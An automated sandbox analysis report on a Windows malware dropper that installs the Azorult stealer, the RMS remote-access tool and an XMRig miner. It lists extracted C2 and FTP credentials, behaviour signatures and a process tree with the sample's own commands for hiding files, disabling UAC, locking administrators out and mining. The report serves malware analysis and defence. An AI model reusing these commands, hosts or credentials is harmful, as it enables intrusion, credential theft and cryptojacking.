Downloads.rar

General

Target: LtHv0O2KZDK4M637.exe
Filesize: 139MB
Completed: 19-11-2020 10:40
Score: 10/10
Malware Config

Extracted

Credentials

Protocol: ftp

Host: 109.248.203.81

Port: 21

Username: alex

Password: easypassword

Extracted

Family: azorult
C2: http://195.245.112.115/index.php

Signatures (56)

  • Azorult

    Description

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings

    TTPs

    Modify Registry, Modify Existing Service, Disabling Security Tools
  • Modifies visibility of hidden/system files in Explorer

    TTPs

    Hidden Files and Directories, Modify Registry
  • RMS

    Description

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass

    TTPs

    Bypass User Account Control, Disabling Security Tools, Modify Registry
  • Windows security bypass

    TTPs

    Disabling Security Tools, Modify Registry
  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software

    Description

    Detects file using ACProtect software.

    Reported IOCs

    resource | yara_rule
    behavioral14/files/0x000100000001abca-391.dat | acprotect
    behavioral14/files/0x000100000001abcb-392.dat | acprotect
  • Detected Stratum cryptominer command

    Description

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges

    Description

    Uses net.exe to modify the user's privileges.

    TTPs

    Account Manipulation
  • XMRig Miner Payload

    Reported IOCs

    resource | yara_rule
    behavioral14/files/0x0005000000019c0b-969.dat | xmrig
    behavioral14/files/0x0005000000019c0b-975.dat | xmrig
  • ASPack v2.12-2.42

    Description

    Detects executables packed with ASPack v2.12-2.42

    Reported IOCs

    resource | yara_rule
    behavioral14/files/0x000700000001abc1-377.dat | aspack_v212_v242
    behavioral14/files/0x000700000001abc1-378.dat | aspack_v212_v242
    behavioral14/files/0x000700000001abc1-384.dat | aspack_v212_v242
    behavioral14/files/0x000700000001abc1-389.dat | aspack_v212_v242
    behavioral14/files/0x000700000001abc1-390.dat | aspack_v212_v242
    behavioral14/files/0x000200000001a50e-393.dat | aspack_v212_v242
    behavioral14/files/0x000200000001a50e-397.dat | aspack_v212_v242
    behavioral14/files/0x000200000001a50e-396.dat | aspack_v212_v242
    behavioral14/files/0x000200000001a50e-434.dat | aspack_v212_v242
  • Blocks application from running via registry modification

    Description

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory
    taskhost.exe, LtHv0O2KZDK4M637.exe, cmd.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Windows\SysWOW64\drivers\conhost.exe | taskhost.exe
    File opened for modification | C:\Windows\SysWOW64\drivers\conhost.exe | taskhost.exe
    File opened for modification | C:\Windows\System32\drivers\etc\hosts | LtHv0O2KZDK4M637.exe
    File opened for modification | C:\Windows\System32\drivers\etc\hosts | cmd.exe
  • Executes dropped EXE
    wini.exe, winit.exe, rutserv.exe, sys.exe, rfusclient.exe, cheat.exe, taskhost.exe, taskhostw.exe, winlogon.exe, R8.exe, Rar.exe, RDPWInst.exe, audiodg.exe, MicrosoftHost.exe

    Reported IOCs

    pid | process
    3692 | wini.exe
    4032 | winit.exe
    2156 | rutserv.exe
    2092 | rutserv.exe
    3976 | sys.exe
    4080 | rutserv.exe
    360 | rutserv.exe
    2412 | rfusclient.exe
    728 | rfusclient.exe
    640 | cheat.exe
    2128 | rfusclient.exe
    3096 | taskhost.exe
    1912 | taskhostw.exe
    4248 | winlogon.exe
    4236 | R8.exe
    4792 | Rar.exe
    4888 | RDPWInst.exe
    2544 | RDPWInst.exe
    5304 | audiodg.exe
    3040 | MicrosoftHost.exe
  • Modifies Windows Firewall

    TTPs

    Modify Existing Service
  • Registers new Print Monitor

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry
  • Sets DLL path for service in the registry

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry
  • Sets file to hidden

    Description

    Modifies file attributes to stop it showing in Explorer etc.

    TTPs

    Hidden Files and Directories
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Reported IOCs

    resource | yara_rule
    behavioral14/files/0x000100000001abca-391.dat | upx
    behavioral14/files/0x000100000001abcb-392.dat | upx
    behavioral14/files/0x000200000001abd4-479.dat | upx
    behavioral14/files/0x000200000001abd4-477.dat | upx
  • Loads dropped DLL
    sys.exe, svchost.exe

    Reported IOCs

    pid | process
    3976 | sys.exe
    4952 | svchost.exe
  • Modifies file permissions
    icacls.exe (64 instances)

    TTPs

    File Permissions Modification

  • Reads data files stored by FTP clients

    Description

    Tries to access configuration files associated with programs like FileZilla.

    TTPs

    Data from Local System, Credentials in Files
  • Reads user/profile data of local email clients

    Description

    Email clients store some user data on disk where infostealers will often target it.

    TTPs

    Data from Local System, Credentials in Files
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local System, Credentials in Files
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    TTPs

    Data from Local System, Credentials in Files
  • Adds Run key to start application
    taskhostw.exe, LtHv0O2KZDK4M637.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | taskhostw.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | taskhostw.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | LtHv0O2KZDK4M637.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | LtHv0O2KZDK4M637.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    LtHv0O2KZDK4M637.exe

    TTPs

    System Information Discovery

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | LtHv0O2KZDK4M637.exe
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    13 | ip-api.com
  • Modifies WinLogon
    LtHv0O2KZDK4M637.exe, reg.exe, RDPWInst.exe, regedit.exe

    TTPs

    Winlogon Helper DLL, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | LtHv0O2KZDK4M637.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | LtHv0O2KZDK4M637.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | reg.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWInst.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | reg.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | LtHv0O2KZDK4M637.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | LtHv0O2KZDK4M637.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | LtHv0O2KZDK4M637.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | LtHv0O2KZDK4M637.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | regedit.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | regedit.exe
  • Drops file in Program Files directory
    taskhost.exe, attrib.exe, RDPWInst.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Program Files (x86)\Microsoft JDX | taskhost.exe
    File opened for modification | C:\Program Files\ByteFence | taskhost.exe
    File opened for modification | C:\Program Files\SpyHunter | taskhost.exe
    File opened for modification | C:\Program Files\Cezurity | taskhost.exe
    File opened for modification | C:\Program Files\AVAST Software\Avast | attrib.exe
    File opened for modification | C:\Program Files\ESET | attrib.exe
    File opened for modification | C:\Program Files\Malwarebytes\Anti-Malware | attrib.exe
    File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | attrib.exe
    File opened for modification | C:\Program Files (x86)\SpyHunter | taskhost.exe
    File opened for modification | C:\Program Files\Malwarebytes | taskhost.exe
    File opened for modification | C:\Program Files (x86)\AVAST Software | taskhost.exe
    File opened for modification | C:\Program Files (x86)\Cezurity | taskhost.exe
    File created | C:\Program Files\Common Files\System\iediagcmd.exe | taskhost.exe
    File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | RDPWInst.exe
    File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | attrib.exe
    File opened for modification | C:\Program Files\RDP Wrapper | attrib.exe
    File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | taskhost.exe
    File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | RDPWInst.exe
    File created | C:\Program Files\Common Files\System\iexplore.exe | taskhost.exe
    File opened for modification | C:\Program Files\Enigma Software Group | taskhost.exe
    File opened for modification | C:\Program Files\AVG | taskhost.exe
    File opened for modification | C:\Program Files\360\Total Security | attrib.exe
    File opened for modification | C:\Program Files (x86)\Kaspersky Lab | taskhost.exe
    File opened for modification | C:\Program Files\ESET | taskhost.exe
    File opened for modification | C:\Program Files\AVAST Software | taskhost.exe
    File opened for modification | C:\Program Files\Kaspersky Lab | taskhost.exe
    File opened for modification | C:\Program Files (x86)\Panda Security | taskhost.exe
    File opened for modification | C:\Program Files (x86)\Zaxar | taskhost.exe
    File opened for modification | C:\Program Files (x86)\360 | taskhost.exe
    File opened for modification | C:\Program Files\COMODO | taskhost.exe
    File opened for modification | C:\Program Files (x86)\AVG | taskhost.exe
  • Drops file in Windows directory
    taskhost.exe, attrib.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Windows\boy.exe | taskhost.exe
    File opened for modification | C:\Windows\boy.exe | taskhost.exe
    File created | C:\Windows\svchost.exe | taskhost.exe
    File opened for modification | C:\Windows\svchost.exe | taskhost.exe
    File opened for modification | C:\Windows\NetworkDistribution | taskhost.exe
    File created | C:\Windows\java.exe | taskhost.exe
    File opened for modification | C:\Windows\java.exe | taskhost.exe
    File opened for modification | C:\WINDOWS\McMwt | attrib.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks SCSI registry key(s)
    spoolsv.exe

    Description

    SCSI information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 | spoolsv.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | spoolsv.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 | spoolsv.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 | spoolsv.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID | spoolsv.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID | spoolsv.exe
  • Checks processor information in registry
    winit.exe, sys.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winit.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | sys.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | sys.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | winit.exe
  • Delays execution with timeout.exe
    timeout.exe (9 instances)

    Reported IOCs

    pid | process
    2328 | timeout.exe
    4088 | timeout.exe
    4576 | timeout.exe
    4280 | timeout.exe
    200 | timeout.exe
    4936 | timeout.exe
    4288 | timeout.exe
    5796 | timeout.exe
    2900 | timeout.exe
  • Gathers network information
    ipconfig.exe

    Description

    Uses commandline utility to view network configuration.

    TTPs

    System Information Discovery, Command-Line Interface

    Reported IOCs

    pid | process
    2004 | ipconfig.exe
  • Kills process with taskkill
    taskkill.exe (6 instances)

    Reported IOCs

    pid | process
    4724 | taskkill.exe
    4504 | taskkill.exe
    4544 | taskkill.exe
    4840 | taskkill.exe
    4904 | taskkill.exe
    5940 | taskkill.exe
  • Modifies data under HKEY_USERS
    spoolsv.exe

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices | spoolsv.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" | spoolsv.exe
    Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" | spoolsv.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" | spoolsv.exe
    Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | spoolsv.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" | spoolsv.exe
    Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" | spoolsv.exe
  • Modifies registry class
    winit.exe, R8.exe, cmd.exe, wini.exe

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | winit.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings | R8.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings | cmd.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings | wini.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database | winit.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | winit.exe
  • NTFS ADS
    taskhostw.exe, LtHv0O2KZDK4M637.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | taskhostw.exe
    File opened for modification | C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ | LtHv0O2KZDK4M637.exe
  • Runs .reg file with regedit
    regedit.exe (2 instances)

    Reported IOCs

    pid | process
    1140 | regedit.exe
    2576 | regedit.exe
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses
    LtHv0O2KZDK4M637.exe, rutserv.exe

    Reported IOCs

    pid | process
    1316 | LtHv0O2KZDK4M637.exe
    2156 | rutserv.exe
  • Suspicious behavior: GetForegroundWindowSpam
    taskhostw.exe

    Reported IOCs

    pid | process
    1912 | taskhostw.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pid | process
    624 | (no process name recorded)
  • Suspicious behavior: SetClipboardViewer
    rfusclient.exe

    Reported IOCs

    pid | process
    2128 | rfusclient.exe
  • Suspicious use of AdjustPrivilegeToken
    rutserv.exe, LtHv0O2KZDK4M637.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 2156 | rutserv.exe
    Token: SeDebugPrivilege | 4080 | rutserv.exe
    Token: SeTakeOwnershipPrivilege | 360 | rutserv.exe
    Token: SeTcbPrivilege | 360 | rutserv.exe
    Token: SeDebugPrivilege | 1316 | LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege | 1316 | LtHv0O2KZDK4M637.exe
  • Suspicious use of SetWindowsHookEx
    winit.exe, rutserv.exe, WinMail.exe, taskhost.exe, taskhostw.exe, R8.exe, winlogon.exe, audiodg.exe, MicrosoftHost.exe

    Reported IOCs

    pid | process
    4032 | winit.exe
    2156 | rutserv.exe
    2092 | rutserv.exe
    4080 | rutserv.exe
    360 | rutserv.exe
    976 | WinMail.exe
    556 | WinMail.exe
    3096 | taskhost.exe
    1912 | taskhostw.exe
    4236 | R8.exe
    4248 | winlogon.exe
    5304 | audiodg.exe
    3040 | MicrosoftHost.exe
  • Suspicious use of WriteProcessMemory
    LtHv0O2KZDK4M637.exe, wini.exe, WScript.exe, cmd.exe, rutserv.exe, winit.exe, WinMail.exe, sys.exe

    Reported IOCs

    description | pid | process | target process
    PID 1316 wrote to memory of 3692 | 1316 | LtHv0O2KZDK4M637.exe | wini.exe
    PID 3692 wrote to memory of 1564 | 3692 | wini.exe | WScript.exe
    PID 3692 wrote to memory of 4032 | 3692 | wini.exe | winit.exe
    PID 1564 wrote to memory of 3268 | 1564 | WScript.exe | cmd.exe
    PID 3268 wrote to memory of 1140 | 3268 | cmd.exe | regedit.exe
    PID 3268 wrote to memory of 2576 | 3268 | cmd.exe | regedit.exe
    PID 3268 wrote to memory of 200 | 3268 | cmd.exe | timeout.exe
    PID 3268 wrote to memory of 2156 | 3268 | cmd.exe | rutserv.exe
    PID 3268 wrote to memory of 2092 | 3268 | cmd.exe | rutserv.exe
    PID 1316 wrote to memory of 3976 | 1316 | LtHv0O2KZDK4M637.exe | sys.exe
    PID 3268 wrote to memory of 4080 | 3268 | cmd.exe | rutserv.exe
    PID 360 wrote to memory of 728 | 360 | rutserv.exe | rfusclient.exe
    PID 360 wrote to memory of 2412 | 360 | rutserv.exe | rfusclient.exe
    PID 3268 wrote to memory of 3956 | 3268 | cmd.exe | attrib.exe
    PID 3268 wrote to memory of 988 | 3268 | cmd.exe | attrib.exe
    PID 3268 wrote to memory of 1144 | 3268 | cmd.exe | sc.exe
    PID 3268 wrote to memory of 2284 | 3268 | cmd.exe | sc.exe
    PID 4032 wrote to memory of 976 | 4032 | winit.exe | WinMail.exe
    PID 3268 wrote to memory of 2968 | 3268 | cmd.exe | sc.exe
    PID 976 wrote to memory of 556 | 976 | WinMail.exe | WinMail.exe
    PID 3976 wrote to memory of 2520 | 3976 | sys.exe | cmd.exe
    PID 2520 wrote to memory of 2328 | 2520 | cmd.exe | timeout.exe
  • System policy modification
    LtHv0O2KZDK4M637.exe

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | LtHv0O2KZDK4M637.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | LtHv0O2KZDK4M637.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | LtHv0O2KZDK4M637.exe
  • Views/modifies file attributes
    attrib.exe (31 instances)

    TTPs

    Hidden Files and Directories

    Reported IOCs

    pid | process
    4196 | attrib.exe
    5880 | attrib.exe
    1796 | attrib.exe
    6064 | attrib.exe
    5080 | attrib.exe
    6068 | attrib.exe
    6044 | attrib.exe
    5428 | attrib.exe
    5652 | attrib.exe
    5108 | attrib.exe
    5916 | attrib.exe
    2896 | attrib.exe
    6032 | attrib.exe
    5472 | attrib.exe
    5092 | attrib.exe
    2500 | attrib.exe
    5744 | attrib.exe
    5272 | attrib.exe
    988 | attrib.exe
    5432 | attrib.exe
    5792 | attrib.exe
    5892 | attrib.exe
    5696 | attrib.exe
    5588 | attrib.exe
    1132 | attrib.exe
    4560 | attrib.exe
    1640 | attrib.exe
    6008 | attrib.exe
    3956 | attrib.exe
    4712 | attrib.exe
    5188 | attrib.exe
Processes 504
  • C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
    "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
    Drops file in Drivers directory
    Adds Run key to start application
    Checks whether UAC is enabled
    Modifies WinLogon
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:1316
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3692
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:3268
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Modifies WinLogon
            Runs .reg file with regedit
            PID:1140
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:2576
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:200
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:2156
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:2092
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:4080
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:3956
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:988
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:1144
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:2284
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:2968
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          Suspicious use of WriteProcessMemory
          PID:976
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:4084
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:4088
    • C:\ProgramData\install\sys.exe
      C:\ProgramData\install\sys.exe
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
        Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\timeout.exe
          C:\Windows\system32\timeout.exe 3
          Delays execution with timeout.exe
          PID:2328
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      PID:640
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        PID:3096
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          NTFS ADS
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:1912
          • C:\Programdata\WindowsTask\winlogon.exe
            C:\Programdata\WindowsTask\winlogon.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:4248
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /query /fo list
              PID:4296
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /query /fo list
                PID:4348
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
            PID:4124
            • C:\Windows\system32\ipconfig.exe
              ipconfig /flushdns
              Gathers network information
              PID:2004
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c gpupdate /force
            PID:4396
            • C:\Windows\system32\gpupdate.exe
              gpupdate /force
              PID:4512
          • C:\ProgramData\WindowsTask\audiodg.exe
            C:\ProgramData\WindowsTask\audiodg.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:5304
          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
            C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
          PID:3500
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:724
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
          PID:352
